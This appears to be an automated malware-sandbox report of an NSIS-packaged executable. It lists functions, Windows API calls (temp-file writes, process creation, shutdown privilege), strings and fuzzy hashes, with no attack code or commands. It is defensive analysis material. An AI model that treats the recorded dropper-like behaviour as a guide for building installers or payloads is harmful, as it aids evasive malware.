Opcode Fuzzy Hash: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
Instruction Fuzzy Hash: C4F05E30A09220AFC6319F20FE4CA9B7BA4F704B52F400876F501F12E4D7B49882DB9C

Function 00404DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E1F
CallWindowProcA.USER32(?,?,?,?), ref: 00404E70

Part of subcall function 00403ECB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EDD

Strings

, xrefs: 00404E00

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
Instruction ID: 735a5b7f30d8858267acffd8a6d90af7f660f30547e28e970091e6d44494b330
Opcode Fuzzy Hash: 5dada047682112313140c13506a5b2f93221c63534166fe2e7e810a4baede890
Instruction Fuzzy Hash: 5D01D4B1100208ABDF216F11DC80E5B3B65F7C0755F148037F704762E1C3398C929BAA

Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E

Strings

C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll, xrefs: 004024DD, 00402502

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll
API String ID: 427699356-3756731299
Opcode ID: 0d8f7926e3efbfeae62077498417c4e8ed7d546d0ceab61f0b32f3c26c981e43
Instruction ID: a883fdd419b2a4eb5493ceda3f40f573e301ba6e05519d4286a6244a7debee73
Opcode Fuzzy Hash: 0d8f7926e3efbfeae62077498417c4e8ed7d546d0ceab61f0b32f3c26c981e43
Instruction Fuzzy Hash: E4F054B2A54244EBDB40EBA19E49AAB7664DB00304F10443BB141F61C2D6BC6941966D

Function 00405344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
CloseHandle.KERNEL32(?), ref: 00405376

Strings

Error launching installer, xrefs: 00405357

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
Instruction ID: a3642443da7e6be1e7fb37006141d073ee56f3b6b1647af5c4ef1a74181a0ab0
Opcode Fuzzy Hash: 126aa3d4d4e638790fde90d53af1e07ec8a7b05fd6d4067bf7b2d028a6df327b
Instruction Fuzzy Hash: B4E0ECB4A00209ABEB119F64EC09D6B7BBCFB14344B404521A915E2260D778E4188ABD

Function 00405668 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,00402C95,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 0040566E
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,00402C95,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 0040567C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00405668

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 2709904686-670666241
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: 230f2e7a0103d2b68aac624e7a10235ef3a8e2ce08a567a17c6e9ee09cd0968c
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 5CD0A77280CD702EF30352108C04B9F6A48CF22300F0904A2E040E21D0C67D1C424BED

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
Opcode Fuzzy Hash: 4e74f259284b15c0abdbbb14bcbb83fd77e67e423db5dae0e516b4deb947cba3
Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28

Function 00405787 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction ID: 879ea975532de9619441bb2369f95f9e0e18c5552eb9cc1946a4235f5f50821d
Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction Fuzzy Hash: D6F0C235604558FFC7129BA4DD4099EBBB8EF56350F2100AAF900F7211D274EE01ABAA

Analysis Process: temp_executable.exePID: 560, Parent PID: 3376COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 339434E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 339434EA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02e2e3d51df58487f47db9c22e73f88f8a138610c827dd7715e20bab82ec4415
Instruction ID: 1eccc406df364fc80c7af18456abf9df18385d4f1cee6d238a8ed469ef73d0ad
Opcode Fuzzy Hash: 02e2e3d51df58487f47db9c22e73f88f8a138610c827dd7715e20bab82ec4415
Instruction Fuzzy Hash: 7090023170920C52E500A1584614706101587D0202F61C856B1514528DC7A9899576A2

Function 33942B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 33942B9A

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae96d21c93202e16742164c353ce1c0b568b11109ccda1b404fadb4928f42b80
Instruction ID: 3f8cf41b152214503a61d1cf518b0ba9f5093dc500d3306c86320b39ac58a57a
Opcode Fuzzy Hash: ae96d21c93202e16742164c353ce1c0b568b11109ccda1b404fadb4928f42b80
Instruction Fuzzy Hash: 9590023130518C52E510A158850474A001587D0302F55C856B5514618DC6A988D57221

Function 33942BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 33942BCA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 543460292924eb7cd5c0ca9fa33921545c91fe1989ec2c83c87bf0a5e6ef159e
Instruction ID: fe3f3f1aa2f758cdb7efc6ea1760a47964be6f7e582cc194b4159fe59fe045b7
Opcode Fuzzy Hash: 543460292924eb7cd5c0ca9fa33921545c91fe1989ec2c83c87bf0a5e6ef159e
Instruction Fuzzy Hash: 1790023130510C52E500A5985508646001587E0302F51D456B6114515EC67988D57231

Function 33942EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 33942EBA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd6695a9a2080044974cf40c3e7f8c52a814da88162dca6624ae59b259a23850
Instruction ID: f0d4a4a43c378354664553f8886553b10cf735ed5a688e27f06e2d23befaccbf
Opcode Fuzzy Hash: fd6695a9a2080044974cf40c3e7f8c52a814da88162dca6624ae59b259a23850
Instruction Fuzzy Hash: 9490023130550C52E500A158491470B001587D0303F51C456B2254515DC63988957671

Function 33942D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 33942D1A

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 697451a6f1d0fa452d675d94cf839b84e2f355252e16ce9db03d596cbc38bddb
Instruction ID: 2bac0022837a3d4f79421dde20c312b765c283696bd67af1365a6cada98572d0
Opcode Fuzzy Hash: 697451a6f1d0fa452d675d94cf839b84e2f355252e16ce9db03d596cbc38bddb
Instruction Fuzzy Hash: B190023130510C63E511A1584604707001987D0242F91C857B1514518DD66A8996B221

Non-executed Functions

Function 004047F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404811
GetDlgItem.USER32(?,00000408), ref: 0040481C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
LoadBitmapA.USER32(0000006E), ref: 00404879
SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
DeleteObject.GDI32(00000000), ref: 004048EF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049E6
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
GetWindowLongA.USER32(?,000000F0), ref: 00404A29
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
ShowWindow.USER32(?,00000005), ref: 00404A48
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
ImageList_Destroy.COMCTL32(?), ref: 00404C18
GlobalFree.KERNEL32(?), ref: 00404C28
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
ShowWindow.USER32(?,00000000), ref: 00404DC7
GetDlgItem.USER32(?,000003FE), ref: 00404DD2
ShowWindow.USER32(00000000), ref: 00404DD9

Strings

, xrefs: 00404DB1
N, xrefs: 00404A83
M, xrefs: 004049A2

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
Instruction ID: 85f2183cf6d0466de3af39f406c7ee36f40fbb46029595ad20bc80e91715a9ea
Opcode Fuzzy Hash: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
Instruction Fuzzy Hash: 0B0281B0A00209AFEB20DF55DD85AAE7BB5FB84315F14817AF610B62E1C7789D42CF58

Function 004030E2 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 324
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403103
SetErrorMode.KERNEL32(00008001), ref: 0040310E
OleInitialize.OLE32(00000000), ref: 00403115

Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA

SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D

Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E

GetCommandLineA.KERNEL32(0042DBA0,NSIS Error), ref: 00403152
GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 00403165
CharNextA.USER32(00000000,00434000,00000020), ref: 00403190
GetTempPathA.KERNEL32(00000400,00435400,00000000,00000020), ref: 0040328D
GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 0040329E
lstrcatA.KERNEL32(00435400,\Temp), ref: 004032AA
GetTempPathA.KERNEL32(000003FC,00435400,00435400,\Temp), ref: 004032BE
lstrcatA.KERNEL32(00435400,Low), ref: 004032C6
SetEnvironmentVariableA.KERNEL32(TEMP,00435400,00435400,Low), ref: 004032D7
SetEnvironmentVariableA.KERNEL32(TMP,00435400), ref: 004032DF
DeleteFileA.KERNEL32(00435000), ref: 004032F3
OleUninitialize.OLE32(?), ref: 004033A1
ExitProcess.KERNEL32 ref: 004033C1
lstrcatA.KERNEL32(00435400,~nsu.tmp,00434000,00000000,?), ref: 004033CD
lstrcmpiA.KERNEL32(00435400,00434C00), ref: 004033D9
CreateDirectoryA.KERNEL32(00435400,00000000), ref: 004033E5
SetCurrentDirectoryA.KERNEL32(00435400), ref: 004033EC
DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
CopyFileA.KERNEL32(00435C00,004283E0,00000001), ref: 00403459
CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034DB
ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
ExitProcess.KERNEL32 ref: 0040353A

Strings

\Temp, xrefs: 004032A4
Low, xrefs: 004032C0
TEMP, xrefs: 004032D2
", xrefs: 004031B5
NSIS Error, xrefs: 00403143
~nsu.tmp, xrefs: 004033C7
TMP, xrefs: 004032DA
Error launching installer, xrefs: 00403359
SeShutdownPrivilege, xrefs: 004034ED

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1245305578
Opcode ID: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
Instruction ID: ab5bd0cb9fd354075505a922324eb5159d0c68426fb539e9448df04d541e8703
Opcode Fuzzy Hash: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
Instruction Fuzzy Hash: 5FB105706082416AE7216F659D8DA2B7EA8AB45306F04047FF581B62E3C77C9E05CB6E

Function 339A9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339A9208
RtlDebugPrintTimes.NTDLL ref: 339A92A7
RtlDebugPrintTimes.NTDLL ref: 339A9387
RtlDebugPrintTimes.NTDLL ref: 339A9465
RtlDebugPrintTimes.NTDLL ref: 339A956A
RtlDebugPrintTimes.NTDLL ref: 339A9601
RtlDebugPrintTimes.NTDLL ref: 339A9714
RtlDebugPrintTimes.NTDLL ref: 339A987C

Strings

, xrefs: 339A9704
, xrefs: 339A9657
0, xrefs: 339A9776

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
Instruction ID: 9067d0cd40a08a6db5cc34e2557edb7a9369f5de4216f651537961c07ffd1441
Opcode Fuzzy Hash: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
Instruction Fuzzy Hash: A53205B5A08385CFE350CF68C484B5BBBE9BB88344F044A2EF99987351D775E948CB52

Function 339AFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339AFE28

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 339B0053
About to reallocate block at %p to %Ix bytes, xrefs: 339AFF3A
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 339B021F
HEAP[%wZ]: , xrefs: 339AFF19, 339B0028, 339B0150, 339B01F5, 339B024C
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 339B026A
Just reallocated block at %p to %Ix bytes, xrefs: 339B0171
HEAP: , xrefs: 339AFF26, 339B0035, 339B015D, 339B0202, 339B0259
RtlReAllocateHeap, xrefs: 339AFE3F, 339AFEE2

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: ec3a1ade1027db9626b75a3e96ae7507dc867012919d4a2d0e5f0bc9220c91d0
Instruction ID: 564bbc989a73d8c87c68765c18c2b6e7604558c386f4d37f0d204f04af91b893
